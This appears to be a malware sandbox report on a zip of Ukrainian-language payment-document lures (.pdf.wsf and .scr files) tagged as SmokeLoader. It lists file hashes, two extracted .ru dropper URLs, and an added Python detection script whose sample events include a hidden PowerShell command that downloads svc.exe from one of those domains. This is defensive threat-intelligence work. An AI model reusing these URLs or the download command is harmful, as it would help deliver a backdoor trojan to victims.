General

  • Target

    250205-nezbvsvrhk_pw_infected.zip

  • Size

    1.1MB

  • Sample

    250207-fw2vbazmhz

  • MD5

    10c3b083bf2556b548a7758a389cb0d5

  • SHA1

    76cfafac6d51ab522dbb79e5c061dc73ac85148b

  • SHA256

    bc27b3afc72c925df021166fccc262ccf75e2be6f8b04c6772ed36ee8d5a1de0

  • SHA512

    3cfa868331a0c5ea6ba28c9b9287a5f36106c6d46ca77050c4799ce726eb504e4b295e0888da1ae7bf1e02a069115abb516e3f8beeafb064241eec567701d431

  • SSDEEP

    24576:o52GUPjZtUTqphtGxtIS/Vlot58uq5lwQEVdBjU9Dzvxc6qpkNa:o5kHUC2t5c7+wQK7wZpc6IkNa

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs (exe.dropper)
    http://bestmagazineforanimalsunicum.ru/download/svc.exe

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs (exe.dropper)
    http://goodmastersportunicum.ru/load/svc.exe

Targets

    • Target

      54678013c8741db3340960e54ba93001c27619ead5cf5cc2eafd4c0fcf797ae6

    • Size

      161KB

    • MD5

      e75185a22cdf243af1a5f41fd53d9a0d

    • SHA1

      b800205252362b86b10a8e8f56e21143cadab40f

    • SHA256

      54678013c8741db3340960e54ba93001c27619ead5cf5cc2eafd4c0fcf797ae6

    • SHA512

      2d24005c1cb99dcda4ee42e6dee07e312f54359a33a73f64d11321d9fb7a661ebfc722dc12745d0bc30ca4577642bf676fc7748923f24a74eaee6283097cc2f8

    • SSDEEP

      3072:Gnbp8yo1TxQ09Qq0AlutdCZpE0pxfyBPY02AGWeAR:+gxQoSdCZpEafqQ09GWeAR

    Score
    3/10
    • Target

      Платежное Поручение в iнозеной валюте та сопроводiтельни документи вiд 23.09.2024p.url

    • Size

      197B

    • MD5

      f68acb34a6164d572fd9fae12223c66d

    • SHA1

      911e0a5ecec7b40883adc6e86383992e043df912

    • SHA256

      2e33c2010f95cbda8bf0817f1b5c69b51c860c536064182b67261f695f54e1d5

    • SHA512

      00c624a474d43829703725e70b64c9524f55816a13a2a9c757bf0421c150c9d6239d07e520d03f23b9664c5c458f330d9a3bcf6ed9bf78a0e8d1cb9ddf51c935

    Score
    1/10
    • Target

      Платежное Поручение в iнозеной валюте.pdf.wsf

    • Size

      219KB

    • MD5

      0359edc4d2038de4660e733f5a80de94

    • SHA1

      681e86b26771ff86c37d8cff72a60b3411f236e9

    • SHA256

      62eb856a5f646c2883a3982f15c3eb877641f9e69783383ce8a73c688eccd543

    • SHA512

      db9fb693f344155fabdcd2b11702a20022869f77b0b925b4067b121c6cd0c35a4b7ae93b4907cedd193e71cfca5c78d7b57a6b221f923d6234a9dc94e0d62549

    • SSDEEP

      1536:DP4ANQd3mqQmBB10kZzt8zxcsw07HdB8S+OFPN6EZLS8+EqlbGDPp9RP4ANQd3m1:yBj5GsTwPMOS8+77Bj5GsTwPMOS8+O

    Score
    10/10
    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Target

      Сопроводiтельни документи вiд 23.09.2024p.pdf.wsf

    • Size

      225KB

    • MD5

      4f6cb09e56494f178fd06ee05c3880ac

    • SHA1

      45810dc8fa00d54a302d8ea5a7563a21c93c94f4

    • SHA256

      5c7d582ba61ac95fb0d330ecc05feeb4853ac1de1f5a6fd12df6491dd0b7ea34

    • SHA512

      ab4ccc4d21d4d719e3c9fbc447d79b6ede14a82dd0ecd162d729805cd8033163484c3464cbcab0a3d9084742004edcfecda6f8901dd2ffa5e3f27b7e495c32b7

    • SSDEEP

      1536:DP4ANQd3mqQmBB10kZzt8zxcsw07HdB8S+OFPN6EZLS8+EKa/GeQP4ANQd3mqQmY:yBj5GsTwPMOS8+UBj5GsTwPMOS8+O

    Score
    10/10
    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Target

      Акт_звiрки_№180924_вiд_26_09_2024р_зг_рах_UA973248410000000026006263319.scr

    • Size

      261KB

    • MD5

      28971ced9168cc58fe92749bdff49afe

    • SHA1

      6b8cb8a205dc3fef12981306d5b7072f519cff3c

    • SHA256

      fdfbdd42944c9e3b9697a8d8375e4e5cfd45c86941aa3f8f6dd0d08607b73144

    • SHA512

      ab82ad76a957e5f558a597b9fcd9d69cad1ab3c185e590d0726eff00623e812076845b4e4b05fc3dc6a95ff73de9d3b492e552ad9d3aaaf6fd672990b3c0e71c

    • SSDEEP

      3072:ELia71mN5VMDa8WrGmL2DO5VK1JLpSm5wgWyhM/5hYKIQ2MMDW27U5O5:ELiM1qqafCD+VKAgThM/5yxNDDo5

    • Target

      a059d671d950abee93ef78a170d58a3839c2a465914ab3bd5411e39c89ae55a2

    • Size

      249KB

    • MD5

      6476071b5a91ac078350768dc9b2e953

    • SHA1

      f40fcb5af96c56305a64790ccbaa261c10173782

    • SHA256

      a059d671d950abee93ef78a170d58a3839c2a465914ab3bd5411e39c89ae55a2

    • SHA512

      87784413018fea89dff5763d08e00d878af9a3db6b29708dec6fe0d0d3feb4eb8f3efc5c27851d13eb779bd3dedebdcc5958e349b8acc03102f8be6b0dd78f9d

    • SSDEEP

      6144:H5LCUgHU2L8e3oGdA0UkzFYc5NHuPCYE:H5GUyUC7oeARkjSCYE

    • Target

      cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c

    • Size

      10KB

    • MD5

      14b3fe437467996209704e6ebaac0f0a

    • SHA1

      76352226e921e8cf57746c551735cd913c3e45c8

    • SHA256

      cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c

    • SHA512

      a4bbc226b4e35afa37702d852325a83103570b01ed76b151ab05a1f96ff855fa12579836dea116e5a9e64bbec63606773ac49ac3b2147a2cd001f46e4d8f93de

    • SSDEEP

      192:mpu81rs1WEVHAq/azhC8bw33tDMRI7xxYG8N0vJod67czsGSVXi:mU81rW1lTyzM33du0viCczSXi

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Command and Scripting Interpreter: PowerShell

      Uses the powershell.exe command.

    • Obfuscated Files or Information: Command Obfuscation

      Adversaries may obfuscate content during command execution to impede detection.

    • Target

      d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21

    • Size

      119KB

    • MD5

      7564fc9db09034f49408c33fae34a335

    • SHA1

      c0a49e5e0054673b3cea2a9e279c896eb2ebec27

    • SHA256

      d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21

    • SHA512

      7e0cc0628d8d6c00c713fa9318d0ec0735f19d449bcf86e6c93e837bd55364d2029b4d309538fc8be5d1b5035499572d2f5e3480593576171b9e6ca059e3b94a

    • SSDEEP

      1536:J7LlLq2TvoxHCQQv56sSFXC5uHQA1pzJGrDwQwMw1UV6XhnOQ5w:dLzTKiQa2SgPpzErF41k6ksw

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Command and Scripting Interpreter: PowerShell

      Uses the powershell.exe command.

    • Obfuscated Files or Information: Command Obfuscation

      Adversaries may obfuscate content during command execution to impede detection.

    • Target

      fdfbdd42944c9e3b9697a8d8375e4e5cfd45c86941aa3f8f6dd0d08607b73144

    • Size

      261KB

    • MD5

      28971ced9168cc58fe92749bdff49afe

    • SHA1

      6b8cb8a205dc3fef12981306d5b7072f519cff3c

    • SHA256

      fdfbdd42944c9e3b9697a8d8375e4e5cfd45c86941aa3f8f6dd0d08607b73144

    • SHA512

      ab82ad76a957e5f558a597b9fcd9d69cad1ab3c185e590d0726eff00623e812076845b4e4b05fc3dc6a95ff73de9d3b492e552ad9d3aaaf6fd672990b3c0e71c

    • SSDEEP

      3072:ELia71mN5VMDa8WrGmL2DO5VK1JLpSm5wgWyhM/5hYKIQ2MMDW27U5O5:ELiM1qqafCD+VKAgThM/5yxNDDo5
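
The chain this report records (a .pdf.wsf attachment run by a script host, PowerShell started with a hidden window, a download of svc.exe from one of the two configured domains, and a country-code lookup in the registry) can be turned directly into detection logic. The block below is an added example and is not part of the sandbox report or its signatures. It runs over constructed Sysmon-style events, not the sandbox's own telemetry; the registry paths in GEO_KEY_FRAGMENTS are assumptions, because the report names the behaviour but not the key it reads; and the generic "any URL ending in /svc.exe" rule deliberately goes beyond the two listed URLs. It also flags the double-extension naming used by both .wsf targets.

```python
"""Detection logic for the execution chain in this report (added example)."""
import os
import re
from dataclasses import dataclass

# Download URLs from the two extracted PowerShell configs in this report.
DROPPER_URLS = (
    "http://bestmagazineforanimalsunicum.ru/download/svc.exe",
    "http://goodmastersportunicum.ru/load/svc.exe",
)
DROPPER_DOMAINS = frozenset(u.split("/")[2].lower() for u in DROPPER_URLS)

# Script hosts that execute .wsf/.js/.vbs attachments.
SCRIPT_HOSTS = frozenset({"wscript.exe", "cscript.exe"})

# ASSUMED registry paths for the country-code lookup: the report names the
# behaviour, not the key, so adjust these to what your telemetry shows.
GEO_KEY_FRAGMENTS = (
    r"\control panel\international\geo\nation",
    r"\control\nls\language",
)

HIDDEN_WINDOW_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
SVC_DOWNLOAD_RE = re.compile(r"https?://[^\s'\"]+/svc\.exe", re.IGNORECASE)
# Document-looking name that actually ends in a script or executable extension.
DOUBLE_EXT_RE = re.compile(
    r"\.(?:pdf|docx?|xlsx?|txt|jpg)\.(?:wsf|js|jse|vbs|vbe|hta|scr|lnk|url)$",
    re.IGNORECASE,
)


@dataclass
class Event:
    kind: str            # "process" or "registry"
    image: str           # full path of the acting process
    parent: str = ""     # full path of the parent (process events)
    cmdline: str = ""    # command line (process events)
    key: str = ""        # registry path read (registry events)


def _name(path: str) -> str:
    """Lower-cased image name from a Windows or POSIX path."""
    return os.path.basename(path.replace("\\", "/")).lower()


def is_deceptive_name(filename: str) -> bool:
    """True for names such as 'invoice.pdf.wsf' that hide the real extension."""
    return DOUBLE_EXT_RE.search(filename) is not None


def classify(ev: Event) -> list[str]:
    """Return the report behaviours a single event matches (empty if none)."""
    hits: list[str] = []
    image, parent = _name(ev.image), _name(ev.parent)
    if ev.kind == "process" and image == "powershell.exe":
        if parent in SCRIPT_HOSTS:
            hits.append("powershell spawned by script host")
        if HIDDEN_WINDOW_RE.search(ev.cmdline):
            hits.append("powershell with hidden window")
        cmd = ev.cmdline.lower()
        if any(d in cmd for d in DROPPER_DOMAINS):
            hits.append("known dropper domain in command line")
        elif SVC_DOWNLOAD_RE.search(ev.cmdline):
            hits.append("svc.exe download URL in command line")
    elif ev.kind == "registry" and image in SCRIPT_HOSTS | {"powershell.exe"}:
        if any(frag in ev.key.lower() for frag in GEO_KEY_FRAGMENTS):
            hits.append("country code lookup (possible geofence)")
    return hits


# Constructed events modelled on the chain in this report; not sandbox output.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\wscript.exe",
          parent=r"C:\Windows\explorer.exe",
          cmdline=r'wscript.exe "C:\Users\u\Downloads\Платежное Поручение в iнозеной валюте.pdf.wsf"'),
    Event("registry", r"C:\Windows\System32\wscript.exe",
          key=r"HKEY_CURRENT_USER\Control Panel\International\Geo\Nation"),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\System32\wscript.exe",
          cmdline="powershell.exe -WindowStyle Hidden -ep bypass -c "
                  "\"(New-Object Net.WebClient).DownloadFile("
                  "'http://bestmagazineforanimalsunicum.ru/download/svc.exe','$env:TEMP\\svc.exe')\""),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\explorer.exe",
          cmdline="powershell.exe -NoProfile -c Get-Date"),   # benign control
]


def triage(events: list[Event]) -> list[tuple[int, list[str]]]:
    """Index and matched behaviours for every event that hit at least one rule."""
    return [(i, h) for i, e in enumerate(events) if (h := classify(e))]


if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS):
        print(i, _name(SAMPLE_EVENTS[i].image), "->", "; ".join(hits))
```

The benign fourth event (PowerShell under explorer.exe, no hidden window, no download) produces no hits, which is the point of keeping the rules conjunctive on process lineage and command-line content rather than alerting on powershell.exe alone. Both configured domains end in `unicum.ru`, so a hunt can pivot on that suffix in proxy or DNS logs as well as on the two exact hosts.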

MITRE ATT&CK Enterprise v15

Tasks

  • static1
    Tags: pdf, link, macro, macro_on_action
    Score 8/10

  • behavioral1
    Tags: discovery
    Score 3/10

  • behavioral2
    Tags: discovery
    Score 3/10

  • behavioral3
    Score 1/10

  • behavioral4
    Score 1/10

  • behavioral5
    Tags: execution
    Score 10/10

  • behavioral6
    Tags: execution
    Score 10/10

  • behavioral7
    Tags: execution
    Score 10/10

  • behavioral8
    Tags: execution
    Score 10/10

  • behavioral9
    Tags: smokeloader, backdoor, trojan
    Score 10/10

  • behavioral10
    Tags: smokeloader, backdoor, discovery, trojan
    Score 10/10

  • behavioral11
    Tags: smokeloader, backdoor, trojan
    Score 10/10

  • behavioral12
    Tags: smokeloader, backdoor, discovery, trojan
    Score 10/10

  • behavioral13
    Tags: execution
    Score 10/10

  • behavioral14
    Tags: execution
    Score 10/10

  • behavioral15
    Tags: execution
    Score 10/10

  • behavioral16
    Tags: execution
    Score 10/10

  • behavioral17
    Tags: defense_evasion, execution
    Score 6/10

  • behavioral18
    Tags: defense_evasion, execution
    Score 7/10

  • behavioral19
    Tags: defense_evasion, discovery, execution
    Score 10/10

  • behavioral20
    Tags: defense_evasion, execution
    Score 10/10

  • behavioral21
    Tags: smokeloader, backdoor, trojan
    Score 10/10

  • behavioral22
    Tags: smokeloader, backdoor, discovery, trojan
    Score 10/10